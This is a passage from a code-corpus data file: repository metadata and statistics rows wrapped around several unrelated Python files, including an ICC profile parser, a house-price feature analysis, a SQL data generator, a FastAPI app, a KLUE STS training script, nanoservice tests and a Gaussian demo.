| 0.783856
| 0.095922
| 0
| 0.036364
| 0
| 0
| 0.175864
| 0.034038
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.163636
| 0
| 0.163636
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e88e1b2de1fea540026e9d706f57f0d6656209
| 7,824
|
py
|
Python
|
tifinity/actions/icc_parser.py
|
pmay/tifinity
|
e004a0e616c7b7455fac6f01ee9acb892cd560c0
|
[
"Apache-2.0"
] | 1
|
2018-05-17T09:48:53.000Z
|
2018-05-17T09:48:53.000Z
|
tifinity/actions/icc_parser.py
|
pmay/tifinity
|
e004a0e616c7b7455fac6f01ee9acb892cd560c0
|
[
"Apache-2.0"
] | 4
|
2018-05-12T10:43:03.000Z
|
2021-02-24T11:17:44.000Z
|
tifinity/actions/icc_parser.py
|
pmay/tifinity
|
e004a0e616c7b7455fac6f01ee9acb892cd560c0
|
[
"Apache-2.0"
] | null | null | null |
class IccProfile():
"""Parses an ICC Colour Profile.
According to spec: all Profile data shall be encoded as big-endian"""
def __init__(self, bytes):
self.header = {}
self.parse_icc(bytes)
def get_colour_space(self):
"""Returns the data colour space type, or None if not defined"""
return self.header.get('data_colour_space')
def tostring(self, limit_value=False):
out = "\nHEADER\n"
for k, v in self.header.items():
out += " [{0:27}]\t{1:31}\n".format(k, v)
out += "\nTAGS ({0})\n".format(self.tag_count)
for tag, (offset, size, value) in self.tags.items():
if len(value)>100 and limit_value:
out += " [{0}]\t{1}\t{2}\t{3}...\n".format(tag, offset, size, value[:100])
else:
out += " [{0}]\t{1}\t{2}\t{3}\n".format(tag, offset, size, value)
return out
def parse_icc(self, bytes):
"""Parsers the specified bytes representing an ICC Profile"""
# ICC profile consists of:
# - 128-byte profile header
# - profile tag table:
# - profile tagged element data (referenced from tag table)
if bytes is not None:
self.read_header(bytes)
self.read_tags(bytes)
def read_header(self, bytes):
self.header['profile_size'] = IccProfile.read_int(bytes, 0)
self.header['preferred_cmm_type'] = IccProfile.read_string(bytes, 4, 4)
self.header['profile_version_number'] = IccProfile.read_binary_coded_decimal(bytes, 8)
self.header['profile_device_class'] = IccProfile.read_string(bytes, 12, 4)
self.header['data_colour_space'] = IccProfile.read_string(bytes, 16, 4)
self.header['pcs'] = IccProfile.read_string(bytes, 20, 4)
self.header['creation_datetime'] = IccProfile.read_datetime(bytes, 24) # YY-mm-dd HH:mm:ss
self.header['acsp'] = IccProfile.read_string(bytes, 36, 4) # Must = acsp
self.header['primary_platform_sig'] = IccProfile.read_string(bytes, 40, 4) # APPL, MSFT, SGI, SUNW, 0
self.header['profile_flags'] = IccProfile.read_int(bytes, 44) # todo: flags
self.header['device_manufacturer'] = IccProfile.read_string(bytes, 48, 4)
self.header['device_model'] = IccProfile.read_int(bytes, 52)
self.header['device_attributes'] = IccProfile.read_int(bytes, 56) # todo: flags
self.header['rendering_intent'] = IccProfile.read_int(bytes, 64)
self.header['nciexyz_values'] = IccProfile.read_xyznumber(bytes, 68)
self.header['profile_creator_signature'] = IccProfile.read_string(bytes, 80, 4)
self.header['profile_id'] = str(bytes[84:99])
self.header['reserved'] = str(bytes[100:128])
def read_tags(self, bytes):
# 4 bytes tag count
# n x 12 byte tags (4 bytes sig, 4 bytes offset (relative to profile start), 4 bytes size of data element)
self.tag_count = IccProfile.read_int(bytes, 128)
self.tags = {}
for t in range(self.tag_count):
type = IccProfile.read_string(bytes, 132+(t*12), 4)
offset = IccProfile.read_int(bytes, 136+(t*12))
size = IccProfile.read_int(bytes, 140+(t*12))
read_func = tagtypes.get(type)
if read_func is not None:
#read_func = getattr(IccProfile, tag_tuple[0])
value = read_func(bytes, offset, size)
else:
value = bytes[offset: offset+size]
self.tags[type] = (offset, size, value)
@staticmethod
def read_int(bytes, offset, count=1, size=4, byteorder='big'):
return int.from_bytes(bytes[offset:offset+size], byteorder=byteorder)
@staticmethod
def read_string(bytes, offset, count, byteorder='big'):
return ''.join(map(chr, bytes[offset:offset+count]))
@staticmethod
def read_binary_coded_decimal(bytes, start):
out = "{0}.{1}.{2}".format(bytes[start],
bytes[start+1]>>4,
bytes[start+1]&0x0F)
return out
@staticmethod
def read_datetime(bytes, offset, byteorder='big'):
out = "{0}-{1}-{2} {3}:{4}:{5}".format(str(int.from_bytes(bytes[offset:offset + 2], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 2:offset + 4], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 4:offset + 6], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 6:offset + 8], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 8:offset + 10], byteorder=byteorder)),
str(int.from_bytes(bytes[offset + 10:offset + 12], byteorder=byteorder)))
return out
@staticmethod
def read_signature_type(bytes, offset, count):
assert (IccProfile.read_string(bytes, offset, 4) == 'sig ')
assert (IccProfile.read_int(bytes, offset + 4) == 0)
return IccProfile.read_string(bytes, offset+8, 4)
@staticmethod
def read_xyztype(bytes, offset, count):
sig = IccProfile.read_string(bytes, offset, 4)
assert(IccProfile.read_int(bytes, offset+4) == 0)
# todo: repeat xyz for remainder of xyztype bytes
xyz = IccProfile.read_xyznumber(bytes, offset+8)
return "{0}: {1}".format(sig, xyz)
@staticmethod
def read_xyznumber(bytes, offset, byteorder='big'):
x_i = IccProfile.read_s15Fixed16Number(bytes, offset)
y_i = IccProfile.read_s15Fixed16Number(bytes, offset+4)
z_i = IccProfile.read_s15Fixed16Number(bytes, offset+8)
return "X={0}, Y={1}, Z={2}".format(x_i, y_i, z_i)
@staticmethod
def read_trctype(bytes, offset, count):
# check first 4 bytes, either 'curv' or 'para'
sig = IccProfile.read_string(bytes, offset, 4)
if sig=='curv':
# next 4 bytes 0
assert (IccProfile.read_int(bytes, offset + 4) == 0)
n = IccProfile.read_int(bytes, offset+8)
vals = [IccProfile.read_int(bytes, offset+12+(2*i), size=2) for i in range(n)]
# todo: para
return "{0} : count {1} : {2}".format(sig, n, vals)
@staticmethod
def read_s15Fixed16Number(bytes, offset):
conv = lambda x: ((x & 0xffff0000) >> 16) + ((x & 0x0000ffff) / 65536)
return conv(int.from_bytes(bytes[offset:offset + 4], byteorder='big'))
@staticmethod
def read_s15Fixed16ArrayType(bytes, offset, count):
assert(IccProfile.read_string(bytes, offset, 4) == 'sf32')
assert(IccProfile.read_int(bytes, offset+4) == 0)
n = int((count-8)/4)
return [IccProfile.read_s15Fixed16Number(bytes, offset+8+(i*4)) for i in range(n)]
tagtypes = {
'chad': (IccProfile.read_s15Fixed16ArrayType),
'cprt': (IccProfile.read_string),
'desc': (IccProfile.read_string),
'dmdd': (IccProfile.read_string),
'tech': (IccProfile.read_signature_type),
'vued': (IccProfile.read_string),
'wtpt': (IccProfile.read_xyztype),
'bkpt': (IccProfile.read_xyztype), # private type?
'rTRC': (IccProfile.read_trctype),
'gTRC': (IccProfile.read_trctype),
'bTRC': (IccProfile.read_trctype),
'rXYZ': (IccProfile.read_xyztype),
'gXYZ': (IccProfile.read_xyztype),
'bXYZ': (IccProfile.read_xyztype),
}
if __name__=='__main__':
import numpy as np
import sys
with open(sys.argv[1], 'rb') as file:
data = np.fromfile(file, dtype="uint8")
profile = IccProfile(data)
print(profile.tostring())
| 45.225434
| 121
| 0.597393
| 977
| 7,824
| 4.647902
| 0.216991
| 0.154151
| 0.079278
| 0.067826
| 0.271306
| 0.192248
| 0.135213
| 0.119797
| 0.055494
| 0.039198
| 0
| 0.03747
| 0.266616
| 7,824
| 173
| 122
| 45.225434
| 0.753921
| 0.092664
| 0
| 0.159091
| 0
| 0
| 0.079167
| 0.013313
| 0
| 0
| 0.003399
| 0.00578
| 0.045455
| 1
| 0.121212
| false
| 0
| 0.015152
| 0.015152
| 0.234848
| 0.007576
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ead80e847ae9dc084472d4e5417a3a4311cbff
| 9,413
|
py
|
Python
|
analisis_de_variables.py
|
scmarquez/Hause-Price-Kaggle-Competition
|
5fe32fed87a7bf2c6e5f41761ea1c4dd00761f21
|
[
"MIT"
] | null | null | null |
analisis_de_variables.py
|
scmarquez/Hause-Price-Kaggle-Competition
|
5fe32fed87a7bf2c6e5f41761ea1c4dd00761f21
|
[
"MIT"
] | null | null | null |
analisis_de_variables.py
|
scmarquez/Hause-Price-Kaggle-Competition
|
5fe32fed87a7bf2c6e5f41761ea1c4dd00761f21
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 29 16:40:53 2017
@author: Sergio
"""
#Analisis de variables
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import ensemble, tree, linear_model
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.metrics import r2_score, mean_squared_error
from sklearn.utils import shuffle
import warnings
#Ignorar los warnings
warnings.filterwarnings('ignore')
#Lectura de los datos
#En train se guandan los datos con los que se entrenará al modelo
train = pd.read_csv('train.csv')
#En test se guarda el conjunto de datos para el test
test = pd.read_csv('test.csv')
#Primero hay que eliminar las varibles que tengan un número alto de valores perdidos
#El número de valores perdidos de cada conjunto en cada variable
NAs = pd.concat([train.isnull().sum()/1460, test.isnull().sum()/1459], axis=1, keys=['Train', 'Test'])
#print(NAs)
#Eliminar todas las variables que tengan más de un 0.2 de valores perdidos
eliminar = []
nvars = 0
for index, row in NAs.iterrows():
print(index)
print(row['Test'])
if (row['Test'] > 0.2) or (row ['Train'] > 0.2):
eliminar.append(index)
#En la variable eliminar estan los nombres de las variables que deben ser directamente eliminadas
#Dentro de las variables a eliminar encontramos que la variable de Alley NA no indica desconocido, es un posible valor más de los posibles a tomar
#Esa variable debe seguir estando en nuestro conjunto
print(eliminar)
eliminar.remove('Alley')
eliminar.remove('FireplaceQu')#Sucede lo mismo que con Alley
train.drop(eliminar,axis=1, inplace=True)
test.drop(eliminar,axis=1, inplace=True)
"""
Ahora es necesario un análisis más profundo de las variables.
En primer lugar encontramos algunas variables que parecen tener una representación
numérica, como por ejemplo 'MSSubClass' o 'OverallCond'.
Al leer la documentación sobre que información aportan las variables
encontramos que OverallCond aunque sea una variable aparentemente nominal
expresa cosas que son medibles como la calidad, es decir muestra una puntuación entre 1 y 10
"""
#Variables numéricas que deben ser transformadas a string
test['MSSubClass'] = test['MSSubClass'].astype(str)
train['MSSubClass'] = train['MSSubClass'].astype(str)
test['YrSold'] = test['YrSold'].astype(str)
train['YrSold'] = train['YrSold'].astype(str)
#Variables categóricas que deben ser numéricas, ya que expresan puntuación
#El lógico pensar que aumentar la puntuación en algo hace efecto directo en el precio final
ExterQualvalues = {'ExterQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
ExterCondvalues = {'ExterCond':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
BsmQualvalues = {'BsmtQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
BsmCondvalues = {'BsmtCond':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1,}}
HeatingQCvalues = {'HeatingQC':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
KitchenQualvalues = {'KitchenQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
FireplaceQuvalues = {'FireplaceQu':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
GarageCondvalues = {'GarageCond':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
GarageQualvalues = {'GarageQual':{'Ex':5,'Gd':4,'TA':3,'Fa':2,'Po':1}}
PoolQCvalues = {'PoolQC':{'Ex':4,'Gd':3,'TA':2,'Fa':1}}
#Reemplazar los valores en las tablas
train.replace(ExterQualvalues,inplace=True)
train.replace(ExterCondvalues,inplace=True)
train.replace(BsmQualvalues,inplace=True)
train.replace(BsmCondvalues,inplace=True)
train.replace(HeatingQCvalues,inplace=True)
train.replace(KitchenQualvalues,inplace=True)
train.replace(FireplaceQuvalues,inplace=True)
train.replace(GarageCondvalues,inplace=True)
train.replace(GarageQualvalues,inplace=True)
train.replace(PoolQCvalues,inplace=True)
test.replace(ExterQualvalues,inplace=True)
test.replace(ExterCondvalues,inplace=True)
test.replace(BsmQualvalues,inplace=True)
test.replace(BsmCondvalues,inplace=True)
test.replace(HeatingQCvalues,inplace=True)
test.replace(KitchenQualvalues,inplace=True)
test.replace(FireplaceQuvalues,inplace=True)
test.replace(GarageCondvalues,inplace=True)
test.replace(GarageQualvalues,inplace=True)
test.replace(PoolQCvalues,inplace=True)
#Ahora tenemos todas las variables con un tipo de dato 'correcto'
#Cuantas variables de cada tipo tenemos
train_labels = train.pop('SalePrice')
features = pd.concat([train, test], keys=['train', 'test'])
enteras = features.dtypes[features.dtypes == 'int64'].index
flotantes = features.dtypes[features.dtypes == 'float64'].index
nominales = features.dtypes[features.dtypes == 'object'].index
#Se pasa a formato lista para su uso
ent = []
for var in enteras:
ent.append(var)
flot = []
for var in flotantes:
flot.append(var)
nom = []
for var in nominales:
nom.append(var)
numericas = ent+flot
#Ahora es necesario rellenar los valores perdidos de cada variable.
"""En algunas de las variables que han sido transformadas a numéricas
NAN no expresa que el dato no exista, sino que expresa puntuación 0"""
features['BsmtQual'] = features['BsmtQual'].fillna(0)
features['BsmtCond'] = features['BsmtCond'].fillna(0)
features['FireplaceQu'] = features['FireplaceQu'].fillna(0)
features['GarageQual'] = features['GarageQual'].fillna(0)
features['GarageCond'] = features['GarageCond'].fillna(0)
#El resto de variables pueden rellenarse con la media
for var in numericas:
if features[var].isnull().sum() > 0:
features[var] = features[var].fillna(features[var].mean())
#El resto ce variables nomnales se rellenan con el valor más frecuente
for var in nominales:
if features[var].isnull().sum() > 0:
features[var] = features[var].fillna(features[var].mode()[0])
"""Una vez que la tabla de datos está en el formato correcto vamos a estudiar la correlación
de las variables con el precio. Las variables que presenten una correlación baja se descartarán
ya que lo único que van a hacer es hacer que nuestro modelo se impreciso.
Si se imputan demasiadas variables perderemos información valiosa y el modelo volverá a ser impreciso.
Sacando un Heatmap se puede ver la correlación de las variables"""
#train_labels = np.log(train_labels)#La transformación logarítmica de los datos los aproxima a una distribución normal
complete = features.loc['train']#Solo se usan las entradas de entrenamiento
complete = pd.concat([complete,train_labels],axis=1)#Se adjunta la columna de precios de nuevo
correlationPlot = complete.corr()#Mantiene la matriz de correlación en un DataFrame
f,ax = plt.subplots(figsize=(12,9))#Configuración del tamaño de la imagen
sns.heatmap(correlationPlot,vmax=.8,square=True)#Crea el heatmap con los valores de correlación
plt.yticks(rotation=0)#cambia el eje de las etiquetas del gráfico para que se vean bien
plt.xticks(rotation=90)#cambia el eje de las etiquetas del gráfico para que se vean bien
plt.show()#Muestra el gráfico
f.savefig('Heatmap.png')#Guarda el gráfico en un archivo
"""La matriz de correlación muestra la correlación entre dos variables de forma que los valores
más claros muestran que dos variables tienen una correlación alta
El siguiente paso del análisis es buscar que variables muestran una correlación alta entre sí y eliminar
una de esas variables, ya que es información redundante y puede eliminarse. Otra manera de enfocar el problema
es que usar dos variables correlacionadas puede ayudar a sofocar el efecto del ruido en una variable.
En primer lugar es necesario descubrir que variables son las que determinan el precio de la vivienda usando la correlación.
"""
#Crear la lista de variables con correlación alta con el precio de la vivienda
"""Inciso:
calcular la correlación antes de aplicar la escala logaritmica a los datos
tiene sentido, pues el coeficiente de correlación de Pearson no varía con
la escala y el origen. Además solo nos sirve para hacer una aproximación
hacia que variables usar o no en el algoritmo. Después si será necesario
hacer que las variables tengan una distribución normalizada.
"""
HighCorrelation = []
for index, row in correlationPlot.iterrows():
if (row['SalePrice'] >= 0.5) or (row ['SalePrice'] <= -0.5):
HighCorrelation.append(index)
print(row['SalePrice'])
print("total de variables: "+str(len(HighCorrelation)))
print(HighCorrelation)
"""Ahora hay que examniar las variables nominales que se tendrán en cuenta
Para hacer este análisis se va a usar una gráfica que exprese la relación entre
el precio y el valor de la vivienda."""
complete = features.loc['train']
complete = pd.concat([complete,train_labels],axis=1)
malas = [#'MSSubClass',
'LandContour',
'LandSlope',
#'RoofStyle',
#'RoofMatl',
'Exterior2nd',
#'Exterior1st',
'MasVnrType',
'BsmtExposure',
'Functional',
'YrSold']
##################################
#malas = ['Utilities', 'RoofMatl','Heating','Functional']
for var in malas:
data = pd.concat([complete[var],complete['SalePrice']],axis=1)
f,ax = plt.subplots(figsize=(12,9))
fig = sns.boxplot(x=var,y="SalePrice",data=data)
fig.axis(ymin=0,ymax=800000)
plt.xticks(rotation=90)
f.savefig(str(var)+'_Price.png')
"""
aparentemente malas variables:
LandContour
LandScope
RoofStyle
RoofMatl
Exterior2nd
Exterior1st
MasVnrType
BsmtExposure
Functional
YrSold
"""
"""Analisis con PCA"""
| 41.46696
| 147
| 0.739403
| 1,362
| 9,413
| 5.097651
| 0.307636
| 0.034855
| 0.023765
| 0.031687
| 0.115368
| 0.101829
| 0.093764
| 0.08685
| 0.053147
| 0.053147
| 0
| 0.01572
| 0.141719
| 9,413
| 226
| 148
| 41.650442
| 0.843669
| 0.220227
| 0
| 0.101695
| 0
| 0
| 0.130911
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076271
| 0
| 0.076271
| 0.050847
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60eb25016e8dffa48a7ee4e49cffca99635d22f2
| 566
|
py
|
Python
|
query-gen.py
|
mdatsev/prostgres
|
3418258a8b832546ef4d5009867bf1cf79248b7b
|
[
"Unlicense"
] | null | null | null |
query-gen.py
|
mdatsev/prostgres
|
3418258a8b832546ef4d5009867bf1cf79248b7b
|
[
"Unlicense"
] | null | null | null |
query-gen.py
|
mdatsev/prostgres
|
3418258a8b832546ef4d5009867bf1cf79248b7b
|
[
"Unlicense"
] | null | null | null |
import random
import sys
ntables = 100
ncols = 100
nrows = 10000
def printstderr(s):
sys.stderr.write(s + '\n')
sys.stderr.flush()
def get_value():
return random.randint(-99999999, 99999999)
for t in range(ntables):
printstderr(f'{t}/{ntables}')
print(f"create table x ({','.join(['x int'] * ncols)});")
for r in range(nrows):
print(f"insert into _last ({','.join(['x'] * ncols)}) values (", end='')
for c in range(ncols):
print(get_value(), end=('' if c==ncols-1 else ','))
print(');')
# 10 min to generate
# 3 min to process
| 21.769231
| 76
| 0.609541
| 85
| 566
| 4.023529
| 0.552941
| 0.061404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067834
| 0.19258
| 566
| 26
| 77
| 21.769231
| 0.680525
| 0.061837
| 0
| 0
| 0
| 0
| 0.224953
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0.055556
| 0.277778
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ec772a2bff1ce4c7f82d3ad31a4b3889b15287
| 708
|
py
|
Python
|
api/main.py
|
Ju99ernaut/super-fastapi
|
83c232bcaff1006d413a9945ced3ba398b673505
|
[
"MIT"
] | null | null | null |
api/main.py
|
Ju99ernaut/super-fastapi
|
83c232bcaff1006d413a9945ced3ba398b673505
|
[
"MIT"
] | null | null | null |
api/main.py
|
Ju99ernaut/super-fastapi
|
83c232bcaff1006d413a9945ced3ba398b673505
|
[
"MIT"
] | null | null | null |
import uvicorn
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from routes import items
import config
from constants import *
config.parse_args()
app = FastAPI(
title="API",
description="API boilerplate",
version="1.0.0",
openapi_tags=API_TAGS_METADATA,
)
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(items.router)
@app.get("/")
async def root():
return {
"docs": "api documentation at /docs or /redoc",
}
if __name__ == "__main__":
uvicorn.run("main:app", host=config.CONFIG.host, port=int(config.CONFIG.port))
| 18.153846
| 82
| 0.686441
| 87
| 708
| 5.37931
| 0.574713
| 0.047009
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005146
| 0.176554
| 708
| 38
| 83
| 18.631579
| 0.797599
| 0
| 0
| 0
| 0
| 0
| 0.117232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60edce602ee84c179651834e36a3725524081131
| 3,522
|
py
|
Python
|
sts/train.py
|
LostCow/KLUE
|
73b1b0526cf6b1b6f5ef535b9527d8abe6ca1a77
|
[
"MIT"
] | 18
|
2021-12-22T09:41:24.000Z
|
2022-03-19T12:54:30.000Z
|
sts/train.py
|
LostCow/KLUE
|
73b1b0526cf6b1b6f5ef535b9527d8abe6ca1a77
|
[
"MIT"
] | null | null | null |
sts/train.py
|
LostCow/KLUE
|
73b1b0526cf6b1b6f5ef535b9527d8abe6ca1a77
|
[
"MIT"
] | 4
|
2021-12-26T11:31:46.000Z
|
2022-03-28T07:55:45.000Z
|
import argparse
import numpy as np
import os
import torch
from transformers import AutoTokenizer, AutoConfig, Trainer, TrainingArguments
from model import RobertaForStsRegression
from dataset import KlueStsWithSentenceMaskDataset
from utils import read_json, seed_everything
from metric import compute_metrics
def main(args):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
config = AutoConfig.from_pretrained(args.model_name_or_path)
config.num_labels = args.num_labels
tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path)
train_file_path = os.path.join(args.data_dir, args.train_filename)
valid_file_path = os.path.join(args.data_dir, args.valid_filename)
train_json = read_json(train_file_path)
valid_json = read_json(valid_file_path)
train_dataset = KlueStsWithSentenceMaskDataset(train_json, tokenizer, 510)
valid_dataset = KlueStsWithSentenceMaskDataset(train_json, tokenizer, 510)
model = RobertaForStsRegression.from_pretrained(
args.model_name_or_path, config=config
)
model.to(device)
training_args = TrainingArguments(
output_dir=args.model_dir,
save_total_limit=args.save_total_limit,
save_steps=args.save_steps,
num_train_epochs=args.num_train_epochs,
learning_rate=args.learning_rate,
per_device_train_batch_size=args.batch_size,
per_device_eval_batch_size=64,
gradient_accumulation_steps=args.gradient_accumulation_steps,
weight_decay=args.weight_decay,
logging_dir="./logs",
logging_steps=args.save_steps,
evaluation_strategy=args.evaluation_strategy,
metric_for_best_model="pearsonr",
fp16=True,
fp16_opt_level="O1",
eval_steps=args.save_steps,
load_best_model_at_end=True,
)
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=valid_dataset,
compute_metrics=compute_metrics,
)
trainer.train()
model.save_pretrained(args.model_dir)
tokenizer.save_pretrained(args.model_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# data_arg
parser.add_argument("--data_dir", type=str, default="./data")
parser.add_argument("--model_dir", type=str, default="./model")
parser.add_argument("--output_dir", type=str, default="./output")
parser.add_argument("--model_name_or_path", type=str, default="klue/roberta-large")
parser.add_argument(
"--train_filename", type=str, default="klue-sts-v1.1_train.json"
)
parser.add_argument("--valid_filename", type=str, default="klue-sts-v1.1_dev.json")
# train_arg
parser.add_argument("--num_labels", type=int, default=1)
parser.add_argument("--seed", type=int, default=15)
parser.add_argument("--num_train_epochs", type=int, default=5)
parser.add_argument("--batch_size", type=int, default=64)
parser.add_argument("--learning_rate", type=float, default=5e-5)
parser.add_argument("--gradient_accumulation_steps", type=int, default=1)
parser.add_argument("--weight_decay", type=float, default=0.01)
# eval_arg
parser.add_argument("--evaluation_strategy", type=str, default="steps")
parser.add_argument("--save_steps", type=int, default=250)
parser.add_argument("--eval_steps", type=int, default=250)
parser.add_argument("--save_total_limit", type=int, default=2)
args = parser.parse_args()
main(args)
| 37.073684
| 87
| 0.727144
| 457
| 3,522
| 5.282276
| 0.2407
| 0.06338
| 0.119718
| 0.024855
| 0.228252
| 0.206711
| 0.158658
| 0.118476
| 0.027341
| 0
| 0
| 0.01253
| 0.161556
| 3,522
| 94
| 88
| 37.468085
| 0.804944
| 0.007666
| 0
| 0
| 0
| 0
| 0.107992
| 0.027499
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013158
| false
| 0
| 0.118421
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60edf40403e6f66a0e02912003729be0d59531bb
| 1,760
|
py
|
Python
|
test/test_base_client.py
|
walkr/nanoservice
|
e2098986b1baa5f283167ae487d14f3c6c21961a
|
[
"MIT"
] | 28
|
2015-03-26T10:25:31.000Z
|
2022-01-31T21:59:11.000Z
|
test/test_base_client.py
|
walkr/nanoservice
|
e2098986b1baa5f283167ae487d14f3c6c21961a
|
[
"MIT"
] | 3
|
2015-09-14T04:10:04.000Z
|
2020-01-29T03:52:05.000Z
|
test/test_base_client.py
|
walkr/nanoservice
|
e2098986b1baa5f283167ae487d14f3c6c21961a
|
[
"MIT"
] | 9
|
2015-09-10T08:11:37.000Z
|
2020-11-08T10:41:51.000Z
|
import unittest
from nanoservice import Responder
from nanoservice import Requester
class BaseTestCase(unittest.TestCase):
def setUp(self):
addr = 'inproc://test'
self.client = Requester(addr)
self.service = Responder(addr)
self.service.register('divide', lambda x, y: x / y)
self.service.register('echo', lambda x: x)
def tearDown(self):
self.client.socket.close()
self.service.socket.close()
class TestClient(BaseTestCase):
def test_build_payload(self):
payload = self.client.build_payload('echo', 'My Name')
method, args, ref = payload
self.assertTrue(method == 'echo')
self.assertTrue(len(payload) == 3)
def test_encoder(self):
data = {'name': 'Joe Doe'}
encoded = self.client.encode(data)
decoded = self.client.decode(encoded)
self.assertEqual(data, decoded)
def test_call_wo_receive(self):
# Requester side ops
method, args = 'echo', 'hello world'
payload = self.client.build_payload(method, args)
self.client.socket.send(self.client.encode(payload))
# Responder side ops
method, args, ref = self.service.receive()
self.assertEqual(method, 'echo')
self.assertEqual(args, 'hello world')
self.assertEqual(ref, payload[2])
def test_basic_socket_operation(self):
msg = 'abc'
self.client.socket.send(msg)
res = self.service.socket.recv().decode('utf-8')
self.assertEqual(msg, res)
def test_timeout(self):
c = Requester('inproc://timeout', timeouts=(1, 1))
c.socket.send('hello')
self.assertRaises(Exception, c.socket.recv)
if __name__ == '__main__':
unittest.main()
| 29.830508
| 62
| 0.630682
| 209
| 1,760
| 5.215311
| 0.339713
| 0.082569
| 0.044037
| 0.040367
| 0.053211
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003745
| 0.241477
| 1,760
| 58
| 63
| 30.344828
| 0.812734
| 0.021023
| 0
| 0
| 0
| 0
| 0.067442
| 0
| 0
| 0
| 0
| 0
| 0.186047
| 1
| 0.162791
| false
| 0
| 0.069767
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60f2562d19bb7ab823ff8910d39c430258f1cd35
| 723
|
py
|
Python
|
Sensor Fusion and Tracking/Kalman Filters/Gaussian/gaussian.py
|
kaka-lin/autonomous-driving-notes
|
6c1b29752d6deb679637766b6cea5c6fe5b72319
|
[
"MIT"
] | null | null | null |
Sensor Fusion and Tracking/Kalman Filters/Gaussian/gaussian.py
|
kaka-lin/autonomous-driving-notes
|
6c1b29752d6deb679637766b6cea5c6fe5b72319
|
[
"MIT"
] | null | null | null |
Sensor Fusion and Tracking/Kalman Filters/Gaussian/gaussian.py
|
kaka-lin/autonomous-driving-notes
|
6c1b29752d6deb679637766b6cea5c6fe5b72319
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
def gaussian(x, mean, std):
std2 = np.power(std, 2)
return (1 / np.sqrt(2* np.pi * std2)) * np.exp(-.5 * (x - mean)**2 / std2)
if __name__ == "__main__":
gauss_1 = gaussian(10, 8, 2) # 0.12098536225957168
gauss_2 = gaussian(10, 10, 2) # 0.19947114020071635
print("Gauss(10, 8, 2): {}".format(gauss_1))
print("Gauss(10, 10, 2): {}".format(gauss_2))
# 標準高斯分佈
mean = 0
variance = 1
